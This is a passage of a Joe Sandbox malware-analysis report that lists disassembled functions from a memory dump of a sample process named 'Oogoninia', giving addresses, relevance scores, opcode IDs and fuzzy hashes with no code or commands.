                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 229c9384a2b5f7c52414845821253de0092cb30cfc1c0220ccea8e9e3501f6f5
                                                                                                                                                                                    • Instruction ID: 240cb38fa05fdc44bf5796d946f0f66f62d487058a54224b73a87a39ef1395c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 229c9384a2b5f7c52414845821253de0092cb30cfc1c0220ccea8e9e3501f6f5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F519D71201686FFEB06CF54C580A46BBB5FF55308F5485AAE808DF222E772EA45CB90
                                                                                                                                                                                    Function 325EA553 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c47d8cfddcada7fee8c06e74a41392c5e8f975d4d3e25a138418da23ebba0c92
                                                                                                                                                                                    • Instruction ID: e1968fca55b6f16b840f600039ebbdeb31e23b2ae80cc6aadcb123425e5da4a7
                                                                                                                                                                                    • Opcode Fuzzy Hash: c47d8cfddcada7fee8c06e74a41392c5e8f975d4d3e25a138418da23ebba0c92
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A41E6B2A057159FDB15CF34C880A9AB7A9FF84354B45892EE9538B344EB70EE14CBD0
                                                                                                                                                                                    Function 32550118 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 0c88285775d193a60c8ec9bae4a5247438cf93fd39a9aa2ded27cd65831f8758
                                                                                                                                                                                    • Instruction ID: dc2dcf91fa7b94376a23f524f61c895f8f37b63c4e0ac1fd8224e709847c0c2d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c88285775d193a60c8ec9bae4a5247438cf93fd39a9aa2ded27cd65831f8758
                                                                                                                                                                                    • Instruction Fuzzy Hash: C041BD7A9013189ADB04CF98C440AEEB7B5BF8C714F60415BE816E7250DB75DE41CBA4
                                                                                                                                                                                    Function 3252D454 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 120d885df77f56fa23db6d63d74c639e3b7192f21c49ce30957358b5bbb07c12
                                                                                                                                                                                    • Instruction ID: 36cdb9a3341fc99eefeea168e29a533556050cdcb5792e3570e77efc12a4319f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 120d885df77f56fa23db6d63d74c639e3b7192f21c49ce30957358b5bbb07c12
                                                                                                                                                                                    • Instruction Fuzzy Hash: F751D0763067909FD716CB18C850B1AB7E5AB84B94F4544A4FC15CB7E0EBB8EE40CBA1
                                                                                                                                                                                    Function 32562670 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ba79e75c36c87f24545180f70a12d9a01ed2a8f8d870cee37deaf396a6d5ce24
                                                                                                                                                                                    • Instruction ID: 27ab48e422958ba6960acd9b9f7d1b319047bc85a8a9f4d3c7fcfd7f80f0bf39
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba79e75c36c87f24545180f70a12d9a01ed2a8f8d870cee37deaf396a6d5ce24
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15514B79A00619CFDB05CF99C480AAEFBB5FF85714F2481A9D815A7354DB31EE81CBA0
                                                                                                                                                                                    Function 32526074 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5deba5f9b64cf4f942697860a240f58b6842cb4d28b3899fdec91c565e9bad08
                                                                                                                                                                                    • Instruction ID: 8d4e3907e98cd63658cbeebda05c169d98857f17717529bd05641898d8591819
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5deba5f9b64cf4f942697860a240f58b6842cb4d28b3899fdec91c565e9bad08
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E51E475A423269FDB15CF24CD00BE9BBB0AF45318F5082AAD519972D1DBB4ABC1CF80
                                                                                                                                                                                    Function 3251B0D6 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c65dadea37673ed43312fb4c124dbf64737af1a56581a83c54bbc28df7b2b5d7
                                                                                                                                                                                    • Instruction ID: 1d0aa903ac8614c1116de8b95d03d6300e9e28eb33b0b48b9d96018d152ab7bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: c65dadea37673ed43312fb4c124dbf64737af1a56581a83c54bbc28df7b2b5d7
                                                                                                                                                                                    • Instruction Fuzzy Hash: E241D471681701EFEB16DF28C840B5ABBF8EF44794F91486AE605DB250DBB5EB40CB50
                                                                                                                                                                                    Function 325E81EE Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a429e7bd2864fa5616e813ca7a266b0ee3475f87ed4f7cd1344b3fbb6e243b4d
                                                                                                                                                                                    • Instruction ID: f6d99fa259451eaf65fbd07d2a5800122cb063d712c6d04cd38782ff690efa8a
                                                                                                                                                                                    • Opcode Fuzzy Hash: a429e7bd2864fa5616e813ca7a266b0ee3475f87ed4f7cd1344b3fbb6e243b4d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E41D675B00215ABDB05CF99E884AEFBBBAEF88754F544069E806A7351DA70DF04C7E0
                                                                                                                                                                                    Function 3254A390 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 081b89898f20b6e55048c559e0914c87e64fd379a9d3b08ca21e34444463c2a7
                                                                                                                                                                                    • Instruction ID: 0d16876888d79f9e40f6014ab2d2807e03861ac3b3c61af805fdb4ed853be1ce
                                                                                                                                                                                    • Opcode Fuzzy Hash: 081b89898f20b6e55048c559e0914c87e64fd379a9d3b08ca21e34444463c2a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C419D76A46304DFEB45CF64C56179DBBB4FF483A8F840566D800AB390DF74AA81CBA0
                                                                                                                                                                                    Function 3254D600 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: df808b715924dc70c027d2b8e08d9ffba9d93eba35823ffd642904ca2b0ea932
                                                                                                                                                                                    • Instruction ID: 1931d49c37f67131d261f30627e0c9866e1deeab224d2bd71ff3307dc73c58f1
                                                                                                                                                                                    • Opcode Fuzzy Hash: df808b715924dc70c027d2b8e08d9ffba9d93eba35823ffd642904ca2b0ea932
                                                                                                                                                                                    • Instruction Fuzzy Hash: E44119B1201240EFD320DF55C850E7AB7A4EF98764F410A2EF91697290CB70FA91C792
                                                                                                                                                                                    Function 32550630 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: bb45d23ddf834a0831131f1ca01957e4557a397a2149bd398b410aa046efd154
                                                                                                                                                                                    • Instruction ID: a78ec95e89329b374b7c91b6f2e96496cb80f5cdd6df1400886626113decf5dd
                                                                                                                                                                                    • Opcode Fuzzy Hash: bb45d23ddf834a0831131f1ca01957e4557a397a2149bd398b410aa046efd154
                                                                                                                                                                                    • Instruction Fuzzy Hash: F14157B6A00715EFDB24CFA9C980A9AB7F4FF48704B60496EE556E7250DB30EB04CB50
                                                                                                                                                                                    Function 325ED7A7 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c2c7cffc34a3a953289f05f27a193386fefad20893bb2c965155400e0d2c4a02
                                                                                                                                                                                    • Instruction ID: fdbb1efd13eef0e42540b4e50a33b43ecad4df410a9dc3adf1d985727c2c2b56
                                                                                                                                                                                    • Opcode Fuzzy Hash: c2c7cffc34a3a953289f05f27a193386fefad20893bb2c965155400e0d2c4a02
                                                                                                                                                                                    • Instruction Fuzzy Hash: DD41D2B660A3018BD315CF28C880B6BBBE9EBC4764F44492DE8A6C7381DA74DA45C791
                                                                                                                                                                                    Function 32551796 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 3473678fe967a781d096557df422f4395e10a525a9b6c3d5e577552ac5267a09
                                                                                                                                                                                    • Instruction ID: 012d461d3280dbaf262000049876078c3c5a40278aee9676de6ac954798358f2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3473678fe967a781d096557df422f4395e10a525a9b6c3d5e577552ac5267a09
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21415975A01355EFDB19CF58C490B99BBF1FF88B14F14C56AE905AB344CB34AA81CB50
                                                                                                                                                                                    Function 325A0227 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7fa671cfd7ff00cb15853ac1a53aa0c66a4d4d295cebb9fee9c152459309445e
                                                                                                                                                                                    • Instruction ID: fd74eb4cada2188ff4d76a5ee8f8fb380219ec771f254b888956ceafd12e36a7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7fa671cfd7ff00cb15853ac1a53aa0c66a4d4d295cebb9fee9c152459309445e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B41C0766197419FC312CF68D851B6EB7E9BF88704F400A2EF858C7690EB70EA14C7A5
                                                                                                                                                                                    Function 325301F1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 1861806732aac5cb6f7b3ba3541868d47102c5d96512aee708faf24a0b32aa3e
                                                                                                                                                                                    • Instruction ID: c756307de71052298d50cb42db5fdd450b98e6178b9289a35a9bfc78da973022
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1861806732aac5cb6f7b3ba3541868d47102c5d96512aee708faf24a0b32aa3e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89311836601344AFDB138BA8CC40BAEBFB9EF44350F044565F954DB392CAB4DA44CBA5
                                                                                                                                                                                    Function 32549194 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 1ed4ba794972f8f4ca4dff8cb490440a88c6aa356f77c5a5bee57176453051d2
                                                                                                                                                                                    • Instruction ID: 29ac0be908299e658c442713cedff1a291df83749b3be1dd761013401cb2062c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ed4ba794972f8f4ca4dff8cb490440a88c6aa356f77c5a5bee57176453051d2
                                                                                                                                                                                    • Instruction Fuzzy Hash: DF319E76B09329AFDB218B24CC41F9ABBB5EF86314F400199A94CA7240CF70DF84CB51
                                                                                                                                                                                    Function 32524180 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: cef748812413c05c4b0c24a63b04baf4517fd19ca07c66e129583748036d7458
                                                                                                                                                                                    • Instruction ID: 93601ded7267762d028d0d8602ce3316e8fc31962a217b3ae193f29cba7d95f0
                                                                                                                                                                                    • Opcode Fuzzy Hash: cef748812413c05c4b0c24a63b04baf4517fd19ca07c66e129583748036d7458
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C41E776201740DFD722CF24C591FE67BE5EF88715F808819E9598B690DBB5EA40CF90
                                                                                                                                                                                    Function 325466E0 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b642d8ad253a3fd9359038847dc2f560810eb88c1ae12a304bb57749a3ce82b1
                                                                                                                                                                                    • Instruction ID: ae5abfdaabd16e84bebcc25d355e7fa6a85029ac2c404bdf7cce96df90e8c39e
                                                                                                                                                                                    • Opcode Fuzzy Hash: b642d8ad253a3fd9359038847dc2f560810eb88c1ae12a304bb57749a3ce82b1
                                                                                                                                                                                    • Instruction Fuzzy Hash: B541D475200A45DFC736CF14C980F9ABBE5FB84B51F804578E4458BAA0CF70EA02DB94
                                                                                                                                                                                    Function 32545004 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: aa1dab4662881dbf18c6bb38dbf5ed4c6a597a61bcf37a366c7c2b47862a1c1e
                                                                                                                                                                                    • Instruction ID: c9421f0d24a0e5a302943a5bbb4ac7926be2ae51e438bb0d94c118bd958c973d
                                                                                                                                                                                    • Opcode Fuzzy Hash: aa1dab4662881dbf18c6bb38dbf5ed4c6a597a61bcf37a366c7c2b47862a1c1e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B3127793083019FE711DE28C410B66FBD8ABA5394F448529F8C8CB381DE75DA41C7E2
                                                                                                                                                                                    Function 3259E79D Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f26c42b5fdf17de54d6bafed2a291f239eb33f416e58f82d4ce208a25d204a3d
                                                                                                                                                                                    • Instruction ID: 3583297cf8b5d0ee498541cb65d8d8f0beeac63ab72bc1aee752453d6572ecda
                                                                                                                                                                                    • Opcode Fuzzy Hash: f26c42b5fdf17de54d6bafed2a291f239eb33f416e58f82d4ce208a25d204a3d
                                                                                                                                                                                    • Instruction Fuzzy Hash: D33127B57817C0EBE3134794CD44FA57BD8FF84B98F9908B1AA049B6D1DF68DA40C290
                                                                                                                                                                                    Function 325196E0 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3446177414-0
                                                                                                                                                                                    • Opcode ID: a62900787131d9fb8a1c2bac7331862098e2dcb515775db6adbf06f45e2ebffd
                                                                                                                                                                                    • Instruction ID: 61e72c4964e1582dece3b85ca036164fde2b3d90dc07d880822ca1f4737893e8
                                                                                                                                                                                    • Opcode Fuzzy Hash: a62900787131d9fb8a1c2bac7331862098e2dcb515775db6adbf06f45e2ebffd
                                                                                                                                                                                    • Instruction Fuzzy Hash: DB21D076901710AFEB229F58C840B9A7BB5EFC5B64F510C29A6569B340DB70FF41CB90
                                                                                                                                                                                    Function 32528470 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
